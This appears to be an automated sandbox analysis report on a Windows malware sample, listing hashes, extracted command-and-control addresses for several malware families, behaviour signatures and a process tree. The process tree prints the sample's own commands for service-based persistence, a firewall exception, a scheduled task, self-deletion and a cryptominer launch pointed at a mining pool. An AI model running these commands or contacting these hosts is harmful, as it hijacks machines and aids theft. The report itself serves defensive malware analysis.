Analysis

  • max time kernel
    153s
  • max time network
    156s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    20-12-2021 06:07

General

  • Target

    ecc612951b2e772b8b7e03f301ac5d0d.exe

  • Size

    322KB

  • MD5

    ecc612951b2e772b8b7e03f301ac5d0d

  • SHA1

    3954bf84a61b80153d44a4db6a5ff0527aa29704

  • SHA256

    055470874ff855cc5baa03bdd1164a4d53ab0a31145bb7c678a2f79e992a732d

  • SHA512

    e22f21b20ac86689599c83fd6dd847e00d0f63de73241f2a24b539c15b6d8abd0e385e8c84958783fca5fd7d4e21d467150b61909bc94c507853931ae2adf325

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

mubrikych.top

oxxyfix.xyz

Extracted

Family

redline

Botnet

install

C2

62.182.156.187:56323

Extracted

Family

amadey

Version

2.86

C2

185.215.113.35/d2VxjasuwS/index.php

Extracted

Family

redline

Botnet

1

C2

86.107.197.138:38133

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Arkei

    Arkei is an infostealer written in C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 2 IoCs
  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 18 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 59 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ecc612951b2e772b8b7e03f301ac5d0d.exe
    "C:\Users\Admin\AppData\Local\Temp\ecc612951b2e772b8b7e03f301ac5d0d.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Users\Admin\AppData\Local\Temp\ecc612951b2e772b8b7e03f301ac5d0d.exe
      "C:\Users\Admin\AppData\Local\Temp\ecc612951b2e772b8b7e03f301ac5d0d.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:3128
  • C:\Users\Admin\AppData\Local\Temp\6974.exe
    C:\Users\Admin\AppData\Local\Temp\6974.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4080
    • C:\Users\Admin\AppData\Local\Temp\6974.exe
      C:\Users\Admin\AppData\Local\Temp\6974.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:3464
  • C:\Users\Admin\AppData\Local\Temp\C2B1.exe
    C:\Users\Admin\AppData\Local\Temp\C2B1.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:884
  • C:\Users\Admin\AppData\Local\Temp\2563.exe
    C:\Users\Admin\AppData\Local\Temp\2563.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Checks processor information in registry
    PID:1116
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2563.exe" & exit
      2⤵
        PID:1236
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 5
          3⤵
          • Delays execution with timeout.exe
          PID:3148
    • C:\Users\Admin\AppData\Local\Temp\2A56.exe
      C:\Users\Admin\AppData\Local\Temp\2A56.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:844
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\phqnxweh\
        2⤵
          PID:2136
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\bxkwehip.exe" C:\Windows\SysWOW64\phqnxweh\
          2⤵
            PID:3196
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" create phqnxweh binPath= "C:\Windows\SysWOW64\phqnxweh\bxkwehip.exe /d\"C:\Users\Admin\AppData\Local\Temp\2A56.exe\"" type= own start= auto DisplayName= "wifi support"
            2⤵
              PID:1196
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" description phqnxweh "wifi internet conection"
              2⤵
                PID:2784
              • C:\Windows\SysWOW64\sc.exe
                "C:\Windows\System32\sc.exe" start phqnxweh
                2⤵
                  PID:2900
                • C:\Windows\SysWOW64\netsh.exe
                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                  2⤵
                    PID:1064
                • C:\Users\Admin\AppData\Local\Temp\2E6E.exe
                  C:\Users\Admin\AppData\Local\Temp\2E6E.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3372
                  • C:\Users\Admin\AppData\Local\Temp\2E6E.exe
                    C:\Users\Admin\AppData\Local\Temp\2E6E.exe
                    2⤵
                    • Executes dropped EXE
                    PID:1220
                  • C:\Users\Admin\AppData\Local\Temp\2E6E.exe
                    C:\Users\Admin\AppData\Local\Temp\2E6E.exe
                    2⤵
                    • Executes dropped EXE
                    PID:1480
                  • C:\Users\Admin\AppData\Local\Temp\2E6E.exe
                    C:\Users\Admin\AppData\Local\Temp\2E6E.exe
                    2⤵
                    • Executes dropped EXE
                    PID:1384
                  • C:\Users\Admin\AppData\Local\Temp\2E6E.exe
                    C:\Users\Admin\AppData\Local\Temp\2E6E.exe
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3960
                • C:\Users\Admin\AppData\Local\Temp\366E.exe
                  C:\Users\Admin\AppData\Local\Temp\366E.exe
                  1⤵
                  • Executes dropped EXE
                  PID:2960
                  • C:\Users\Admin\AppData\Local\Temp\60bb09348e\tkools.exe
                    "C:\Users\Admin\AppData\Local\Temp\60bb09348e\tkools.exe"
                    2⤵
                    • Executes dropped EXE
                    PID:3636
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\60bb09348e\
                      3⤵
                        PID:556
                        • C:\Windows\SysWOW64\reg.exe
                          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\60bb09348e\
                          4⤵
                            PID:1128
                        • C:\Windows\SysWOW64\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\60bb09348e\tkools.exe" /F
                          3⤵
                          • Creates scheduled task(s)
                          PID:648
                    • C:\Users\Admin\AppData\Local\Temp\3D35.exe
                      C:\Users\Admin\AppData\Local\Temp\3D35.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2320
                    • C:\Users\Admin\AppData\Local\Temp\414D.exe
                      C:\Users\Admin\AppData\Local\Temp\414D.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2224
                      • C:\Users\Admin\AppData\Local\Temp\414D.exe
                        C:\Users\Admin\AppData\Local\Temp\414D.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2436
                    • C:\Users\Admin\AppData\Local\Temp\537E.exe
                      C:\Users\Admin\AppData\Local\Temp\537E.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious use of SetThreadContext
                      PID:3608
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        2⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1752
                    • C:\Windows\SysWOW64\phqnxweh\bxkwehip.exe
                      C:\Windows\SysWOW64\phqnxweh\bxkwehip.exe /d"C:\Users\Admin\AppData\Local\Temp\2A56.exe"
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2540
                      • C:\Windows\SysWOW64\svchost.exe
                        svchost.exe
                        2⤵
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        PID:3872
                        • C:\Windows\SysWOW64\svchost.exe
                          svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                          3⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1496
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      1⤵
                      • Accesses Microsoft Outlook profiles
                      • outlook_office_path
                      • outlook_win_path
                      PID:3104
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe
                      1⤵
                        PID:2380
                      • C:\Users\Admin\AppData\Local\Temp\60bb09348e\tkools.exe
                        C:\Users\Admin\AppData\Local\Temp\60bb09348e\tkools.exe
                        1⤵
                        • Executes dropped EXE
                        PID:1104

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • memory/844-189-0x0000000000400000-0x00000000004D1000-memory.dmp

                        Filesize

                        836KB

                      • memory/844-188-0x00000000005D0000-0x000000000071A000-memory.dmp

                        Filesize

                        1.3MB

                      • memory/884-133-0x0000000000850000-0x0000000000859000-memory.dmp

                        Filesize

                        36KB

                      • memory/884-134-0x0000000000400000-0x00000000004CD000-memory.dmp

                        Filesize

                        820KB

                      • memory/884-132-0x0000000000876000-0x0000000000887000-memory.dmp

                        Filesize

                        68KB

                      • memory/1104-292-0x0000000000400000-0x00000000004D6000-memory.dmp

                        Filesize

                        856KB

                      • memory/1116-159-0x0000000000776000-0x0000000000788000-memory.dmp

                        Filesize

                        72KB

                      • memory/1116-164-0x0000000000540000-0x000000000055C000-memory.dmp

                        Filesize

                        112KB

                      • memory/1116-166-0x0000000000400000-0x00000000004D2000-memory.dmp

                        Filesize

                        840KB

                      • memory/1752-304-0x00000000051D0000-0x00000000057D6000-memory.dmp

                        Filesize

                        6.0MB

                      • memory/2224-182-0x0000000002390000-0x0000000002391000-memory.dmp

                        Filesize

                        4KB

                      • memory/2224-181-0x0000000004C60000-0x0000000004C61000-memory.dmp

                        Filesize

                        4KB

                      • memory/2224-169-0x0000000000220000-0x0000000000221000-memory.dmp

                        Filesize

                        4KB

                      • memory/2320-247-0x0000000006650000-0x0000000006651000-memory.dmp

                        Filesize

                        4KB

                      • memory/2320-243-0x00000000050A7000-0x00000000050A9000-memory.dmp

                        Filesize

                        8KB

                      • memory/2320-180-0x0000000005B30000-0x0000000005B31000-memory.dmp

                        Filesize

                        4KB

                      • memory/2320-178-0x00000000006F0000-0x0000000000713000-memory.dmp

                        Filesize

                        140KB

                      • memory/2320-183-0x00000000050A0000-0x00000000050A1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2320-245-0x00000000065E0000-0x00000000065E1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2320-187-0x00000000050A4000-0x00000000050A5000-memory.dmp

                        Filesize

                        4KB

                      • memory/2320-165-0x00000000007F0000-0x0000000000828000-memory.dmp

                        Filesize

                        224KB

                      • memory/2320-171-0x00000000001E0000-0x00000000001E1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2320-184-0x00000000050A2000-0x00000000050A3000-memory.dmp

                        Filesize

                        4KB

                      • memory/2320-162-0x0000000000730000-0x000000000087A000-memory.dmp

                        Filesize

                        1.3MB

                      • memory/2320-186-0x00000000050A3000-0x00000000050A4000-memory.dmp

                        Filesize

                        4KB

                      • memory/2320-161-0x0000000000400000-0x0000000000523000-memory.dmp

                        Filesize

                        1.1MB

                      • memory/2320-160-0x00000000000E0000-0x00000000000E1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2320-158-0x0000000000400000-0x0000000000523000-memory.dmp

                        Filesize

                        1.1MB

                      • memory/2380-255-0x0000000000170000-0x000000000017C000-memory.dmp

                        Filesize

                        48KB

                      • memory/2380-251-0x0000000000180000-0x0000000000187000-memory.dmp

                        Filesize

                        28KB

                      • memory/2436-199-0x00000000052D0000-0x00000000052D1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2436-208-0x0000000004DD0000-0x0000000004DD1000-memory.dmp

                        Filesize

                        4KB

                      • memory/2436-263-0x0000000006F50000-0x0000000006F51000-memory.dmp

                        Filesize

                        4KB

                      • memory/2436-262-0x0000000006850000-0x0000000006851000-memory.dmp

                        Filesize

                        4KB

                      • memory/2436-207-0x0000000004CC0000-0x00000000052C6000-memory.dmp

                        Filesize

                        6.0MB

                      • memory/2436-205-0x0000000004E60000-0x0000000004E61000-memory.dmp

                        Filesize

                        4KB

                      • memory/2436-193-0x0000000000400000-0x0000000000420000-memory.dmp

                        Filesize

                        128KB

                      • memory/2436-206-0x0000000004D90000-0x0000000004D91000-memory.dmp

                        Filesize

                        4KB

                      • memory/2436-202-0x0000000004D30000-0x0000000004D31000-memory.dmp

                        Filesize

                        4KB

                      • memory/2540-280-0x0000000000400000-0x00000000004D1000-memory.dmp

                        Filesize

                        836KB

                      • memory/2540-269-0x0000000000661000-0x0000000000671000-memory.dmp

                        Filesize

                        64KB

                      • memory/2540-278-0x00000000001E0000-0x00000000001F3000-memory.dmp

                        Filesize

                        76KB

                      • memory/2680-115-0x0000000000756000-0x0000000000767000-memory.dmp

                        Filesize

                        68KB

                      • memory/2680-118-0x00000000004E0000-0x000000000062A000-memory.dmp

                        Filesize

                        1.3MB

                      • memory/2960-209-0x0000000000706000-0x0000000000724000-memory.dmp

                        Filesize

                        120KB

                      • memory/2960-217-0x0000000000530000-0x0000000000568000-memory.dmp

                        Filesize

                        224KB

                      • memory/2960-218-0x0000000000400000-0x00000000004D6000-memory.dmp

                        Filesize

                        856KB

                      • memory/3032-135-0x0000000002E10000-0x0000000002E26000-memory.dmp

                        Filesize

                        88KB

                      • memory/3032-128-0x00000000010F0000-0x0000000001106000-memory.dmp

                        Filesize

                        88KB

                      • memory/3032-119-0x0000000001060000-0x0000000001076000-memory.dmp

                        Filesize

                        88KB

                      • memory/3104-254-0x0000000000800000-0x000000000086B000-memory.dmp

                        Filesize

                        428KB

                      • memory/3104-252-0x0000000000870000-0x00000000008E4000-memory.dmp

                        Filesize

                        464KB

                      • memory/3128-116-0x0000000000400000-0x0000000000409000-memory.dmp

                        Filesize

                        36KB

                      • memory/3372-151-0x00000000054A0000-0x00000000054A1000-memory.dmp

                        Filesize

                        4KB

                      • memory/3372-145-0x0000000000380000-0x0000000000381000-memory.dmp

                        Filesize

                        4KB

                      • memory/3372-148-0x0000000002780000-0x0000000002781000-memory.dmp

                        Filesize

                        4KB

                      • memory/3372-149-0x0000000004CA0000-0x0000000004CA1000-memory.dmp

                        Filesize

                        4KB

                      • memory/3372-150-0x0000000002700000-0x0000000002701000-memory.dmp

                        Filesize

                        4KB

                      • memory/3372-147-0x0000000004C00000-0x0000000004C01000-memory.dmp

                        Filesize

                        4KB

                      • memory/3608-223-0x00000000007D0000-0x00000000007D1000-memory.dmp

                        Filesize

                        4KB

                      • memory/3608-224-0x00000000007F0000-0x00000000007F1000-memory.dmp

                        Filesize

                        4KB

                      • memory/3608-221-0x0000000000620000-0x0000000000621000-memory.dmp

                        Filesize

                        4KB

                      • memory/3608-222-0x0000000000630000-0x0000000000631000-memory.dmp

                        Filesize

                        4KB

                      • memory/3608-220-0x0000000000610000-0x0000000000611000-memory.dmp

                        Filesize

                        4KB

                      • memory/3608-225-0x0000000000F10000-0x0000000000F11000-memory.dmp

                        Filesize

                        4KB

                      • memory/3608-228-0x0000000000F30000-0x0000000000F31000-memory.dmp

                        Filesize

                        4KB

                      • memory/3608-229-0x00000000011D0000-0x0000000001C81000-memory.dmp

                        Filesize

                        10.7MB

                      • memory/3608-232-0x0000000000F20000-0x0000000000F21000-memory.dmp

                        Filesize

                        4KB

                      • memory/3636-268-0x0000000000400000-0x00000000004D6000-memory.dmp

                        Filesize

                        856KB

                      • memory/3872-274-0x0000000000A90000-0x0000000000A91000-memory.dmp

                        Filesize

                        4KB

                      • memory/3872-270-0x0000000000B80000-0x0000000000B95000-memory.dmp

                        Filesize

                        84KB

                      • memory/3960-234-0x0000000000400000-0x0000000000420000-memory.dmp

                        Filesize

                        128KB

                      • memory/3960-250-0x00000000052F0000-0x00000000058F6000-memory.dmp

                        Filesize

                        6.0MB

                      • memory/4080-123-0x0000000000736000-0x0000000000747000-memory.dmp

                        Filesize

                        68KB

                      • memory/4080-127-0x0000000000530000-0x0000000000539000-memory.dmp

                        Filesize

                        36KB